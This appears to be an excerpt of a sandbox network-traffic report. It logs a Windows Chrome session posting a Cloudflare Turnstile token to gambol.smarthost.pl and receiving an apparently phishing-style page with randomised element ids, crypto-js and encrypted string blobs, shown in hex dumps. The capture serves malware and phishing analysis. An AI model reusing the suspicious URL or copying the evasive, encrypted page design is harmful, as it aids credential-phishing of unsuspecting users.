                                                                                      2024-11-15 17:09:03 UTC1369INData Raw: 39 32 69 55 74 6e 5a 6e 78 73 65 30 6c 45 68 48 4e 51 62 48 2b 5a 6a 34 35 33 5a 49 70 2b 62 46 61 52 6c 31 39 65 6c 4a 75 53 6c 5a 74 7a 70 33 75 57 72 34 4b 52 73 61 64 78 69 72 4b 4c 70 33 5a 79 74 48 46 34 63 36 75 34 6f 58 36 5a 6c 6f 4b 42 73 35 36 66 6c 72 61 42 70 70 6d 6b 6c 35 32 4a 6b 74 44 47 6e 5a 61 75 7a 70 53 61 32 4c 32 57 6c 4f 44 4f 6d 70 6a 63 31 4b 37 69 78 73 65 6c 35 36 57 6e 72 61 53 6d 7a 50 4b 79 79 76 58 42 7a 74 4c 4f 73 76 65 31 31 37 76 35 31 76 47 38 31 76 41 42 7a 64 37 77 78 4c 38 4a 33 39 7a 4c 2b 4d 30 45 33 64 72 6e 36 39 41 44 37 67 6f 62 46 2b 6f 51 36 4e 54 36 45 64 6e 59 38 68 6e 64 46 42 72 78 32 79 67 4c 35 4f 55 73 49 65 66 6e 38 6a 45 4f 35 7a 55 70 4a 50 6b 6f 46 78 51 47 46 68 63 77 44 54 34 31 4f 77 34 30 4e
                                                                                      Data Ascii: 92iUtnZnxse0lEhHNQbH+Zj453ZIp+bFaRl19elJuSlZtzp3uWr4KRsadxirKLp3ZytHF4c6u4oX6ZloKBs56flraBppmkl52JktDGnZauzpSa2L2WlODOmpjc1K7ixsel56WnraSmzPKyyvXBztLOsve117v51vG81vABzd7wxL8J39zL+M0E3drn69AD7gobF+oQ6NT6EdnY8hndFBrx2ygL5OUsIefn8jEO5zUpJPkoFxQGFhcwDT41Ow40N
                                                                                      2024-11-15 17:09:03 UTC469INData Raw: 71 53 56 31 70 62 6c 52 68 67 6d 70 57 59 6c 43 56 5a 6c 68 31 63 70 5a 68 65 47 74 79 5a 47 36 43 6d 46 75 6d 63 33 64 34 71 59 36 66 63 58 75 50 6a 47 36 79 67 6e 4f 47 6a 62 79 5a 66 48 42 35 66 59 44 42 6b 70 75 4e 66 4a 71 37 79 48 79 57 70 59 69 35 6f 71 37 4e 69 4d 44 48 68 38 57 79 31 64 61 78 6b 62 61 6c 74 71 71 38 6d 62 71 2b 6d 71 36 37 75 72 66 71 71 64 57 30 37 4f 79 33 75 76 43 79 75 37 36 39 76 73 4c 4f 2b 50 58 53 79 2f 79 39 76 73 69 33 77 74 62 68 76 4d 37 57 31 74 45 4a 32 75 49 4e 43 63 58 71 79 41 48 69 34 68 63 55 31 75 51 5a 32 51 6e 32 31 51 72 76 36 74 6e 71 39 76 33 75 37 76 34 47 34 41 41 48 43 4f 55 45 43 78 6f 46 41 69 59 55 45 50 62 79 4e 50 45 59 47 51 38 58 4c 7a 73 58 4c 6b 49 39 4d 44 67 62 51 66 34 43 4e 68 2f 2b 54 6b
                                                                                      Data Ascii: qSV1pblRhgmpWYlCVZlh1cpZheGtyZG6CmFumc3d4qY6fcXuPjG6ygnOGjbyZfHB5fYDBkpuNfJq7yHyWpYi5oq7NiMDHh8Wy1daxkbaltqq8mbq+mq67urfqqdW07Oy3uvCyu769vsLO+PXSy/y9vsi3wtbhvM7W1tEJ2uINCcXqyAHi4hcU1uQZ2Qn21Qrv6tnq9v3u7v4G4AAHCOUECxoFAiYUEPbyNPEYGQ8XLzsXLkI9MDgbQf4CNh/+Tk


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.1662644104.18.94.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:03 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:03 UTC379INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 15 Nov 2024 17:09:03 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 7
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      cf-chl-out: uWfe9QC+TCFe1kqIDVlzXoSLlOcVdtqqNAY=$+cVqUfYYKMXDp/CL
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8caead90bcf-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:09:03 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                      Data Ascii: invalid


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.166264591.211.222.2504437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:04 UTC957OUTPOST /amdhcrviewpmt/ HTTP/1.1
                                                                                      Host: gambol.smarthost.pl
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 902
                                                                                      Cache-Control: max-age=0
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Upgrade-Insecure-Requests: 1
                                                                                      Origin: https://gambol.smarthost.pl
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: navigate
                                                                                      Sec-Fetch-User: ?1
                                                                                      Sec-Fetch-Dest: document
                                                                                      Referer: https://gambol.smarthost.pl/amdhcrviewpmt/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: PHPSESSID=4e927ff4cd1f8500dee1e5063e16de2e; cookie_test=test; js_enabled=true
                                                                                      2024-11-15 17:09:04 UTC902OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 4a 2d 4c 31 6b 6f 6c 4b 5a 54 6d 47 55 31 77 51 34 72 42 67 49 4d 46 65 35 5a 45 4d 4b 4d 6e 42 4d 6c 44 78 47 49 58 6f 6a 69 6f 76 31 35 55 73 66 30 4c 6f 35 50 35 45 42 39 50 63 78 6b 61 65 7a 5f 30 47 72 65 71 43 45 45 30 43 47 71 56 44 49 53 58 37 6b 63 6c 57 57 48 6a 56 61 4d 33 6d 7a 4f 57 56 31 62 55 43 70 4a 5a 63 69 49 58 36 59 73 37 56 6f 62 38 5f 5f 65 72 61 4f 32 39 6f 58 43 70 32 66 52 7a 38 6a 30 48 36 6d 5f 31 37 36 39 44 6e 57 61 6a 64 57 43 2d 65 6c 44 7a 32 33 76 62 2d 35 32 59 45 6b 77 4f 54 52 34 48 45 4b 4a 6c 65 41 61 34 44 73 70 73 6b 55 2d 77 61 45 7a 44 73 72 74 5a 68 41 6f 6c 75 76 7a 63 57 50 66 42 4b 44 51 58 4d 37 6f 61 6c 44 72 38 4b 63 6d 4d 43 67 45 35
                                                                                      Data Ascii: cf-turnstile-response=0.J-L1kolKZTmGU1wQ4rBgIMFe5ZEMKMnBMlDxGIXojiov15Usf0Lo5P5EB9Pcxkaez_0GreqCEE0CGqVDISX7kclWWHjVaM3mzOWV1bUCpJZciIX6Ys7Vob8__eraO29oXCp2fRz8j0H6m_1769DnWajdWC-elDz23vb-52YEkwOTR4HEKJleAa4DspskU-waEzDsrtZhAoluvzcWPfBKDQXM7oalDr8KcmMCgE5
                                                                                      2024-11-15 17:09:04 UTC514INHTTP/1.1 302 Moved Temporarily
                                                                                      Date: Fri, 15 Nov 2024 17:09:04 GMT
                                                                                      Server: Apache
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      Set-Cookie: cookie_test=test; expires=Fri, 15-Nov-2024 18:09:04 GMT; Max-Age=3600; path=/
                                                                                      Upgrade: h2,h2c
                                                                                      Connection: Upgrade, close
                                                                                      Location: /amdhcrviewpmt/
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Frame-Options: sameorigin
                                                                                      Content-Length: 0
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.166264691.211.222.2504437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:04 UTC849OUTGET /amdhcrviewpmt/ HTTP/1.1
                                                                                      Host: gambol.smarthost.pl
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: max-age=0
                                                                                      Upgrade-Insecure-Requests: 1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: navigate
                                                                                      Sec-Fetch-User: ?1
                                                                                      Sec-Fetch-Dest: document
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Referer: https://gambol.smarthost.pl/amdhcrviewpmt/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: PHPSESSID=4e927ff4cd1f8500dee1e5063e16de2e; cookie_test=test; js_enabled=true
                                                                                      2024-11-15 17:09:05 UTC504INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:09:04 GMT
                                                                                      Server: Apache
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      Set-Cookie: cookie_test=test; expires=Fri, 15-Nov-2024 18:09:04 GMT; Max-Age=3600; path=/
                                                                                      Upgrade: h2,h2c
                                                                                      Connection: Upgrade, close
                                                                                      Vary: Accept-Encoding
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Frame-Options: sameorigin
                                                                                      Transfer-Encoding: chunked
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      2024-11-15 17:09:05 UTC7688INData Raw: 32 30 31 30 0d 0a 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72
                                                                                      Data Ascii: 2010 <html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="robots" content="noindex, nofollow"/> <script src="https://cdnjs.cloudflare.com/ajax/libs/cr
                                                                                      2024-11-15 17:09:05 UTC526INData Raw: 69 64 3d 22 7a 69 70 70 79 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 67 61 62 66 65 73 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 62 65 79 61 6e 63 65 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 70 68 74 68 61 6c 65 6e 65 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 61 63 6b 65 74 65 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6f 62 65 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61
                                                                                      Data Ascii: id="zippy"></div> <div id="gabfest"> <div class="abeyance"></div> <div class="naphthalene"></div> </div> <div id="racketeer"> <div id="obese"> <div cla
                                                                                      2024-11-15 17:09:05 UTC2INData Raw: 0d 0a
                                                                                      Data Ascii:
                                                                                      2024-11-15 17:09:05 UTC2565INData Raw: 39 66 65 0d 0a 74 4b 4d 66 65 47 52 57 4b 50 63 4b 63 71 37 68 6d 67 6a 32 61 42 36 66 6b 50 71 2b 77 64 33 4a 75 35 6b 34 45 6b 54 6f 42 42 35 53 6f 63 6d 38 79 6f 73 4a 77 67 46 2f 71 68 52 44 69 70 33 50 64 2f 30 4c 75 76 44 79 33 76 79 61 6c 4c 42 34 32 75 52 2b 31 51 3d 3d 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 70 6f 6c 69 63 79 20 3d 20 22 50 78 4d 76 6d 45 43 32 72 32 75 47 72 4e 64 56 6a 44 54 2f 36 67 70 35 6d 73 58 31 42 77 6e 34 43 7a 52 44 30 4c 6d 35 58 79 39 6d 76 53 4f 59 61 33 52 79 4d 46 66 2b 43 4e 4a 44 71 64 58 43 22 3b 0a 09 09 09 6c 65 74 20 53 56 20 3d 20 22 30 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 53 49 52 20 3d 20 22 30 22 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20
                                                                                      Data Ascii: 9fetKMfeGRWKPcKcq7hmgj2aB6fkPq+wd3Ju5k4EkToBB5Socm8yosJwgF/qhRDip3Pd/0LuvDy3vyalLB42uR+1Q=="; let policy = "PxMvmEC2r2uGrNdVjDT/6gp5msX1Bwn4CzRD0Lm5Xy9mvSOYa3RyMFf+CNJDqdXC";let SV = "0"; let SIR = "0"; function
                                                                                      2024-11-15 17:09:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.1662647104.17.24.144437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:05 UTC565OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                      Host: cdnjs.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://gambol.smarthost.pl/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:05 UTC964INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:09:05 GMT
                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: public, max-age=30672000
                                                                                      ETag: W/"5eb03e2d-bb78"
                                                                                      Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Timing-Allow-Origin: *
                                                                                      X-Content-Type-Options: nosniff
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 290806
                                                                                      Expires: Wed, 05 Nov 2025 17:09:05 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCIeRV2yhXxZ5REQRsfbrMBbrk8eIf52FchZF3xkmnp5%2FEpm5zbbZZqmuVFpvHPKxjeQWURPewAl%2FODt%2FYstP%2BAXub3LDG37jq3MlRaEkM7iSFieAU%2BC%2BvAucyOaYBag7bvP67uc"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8d6ced63ab6-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:09:05 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                      Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                      2024-11-15 17:09:05 UTC1369INData Raw: 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                                                                      Data Ascii: o&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==t
                                                                                      2024-11-15 17:09:05 UTC1369INData Raw: 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a
                                                                                      Data Ascii: ar o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:
                                                                                      2024-11-15 17:09:05 UTC1369INData Raw: 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f
                                                                                      Data Ascii: arse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._do
                                                                                      2024-11-15 17:09:05 UTC1369INData Raw: 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d
                                                                                      Data Ascii: ,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]
                                                                                      2024-11-15 17:09:05 UTC1369INData Raw: 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29
                                                                                      Data Ascii: 092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)
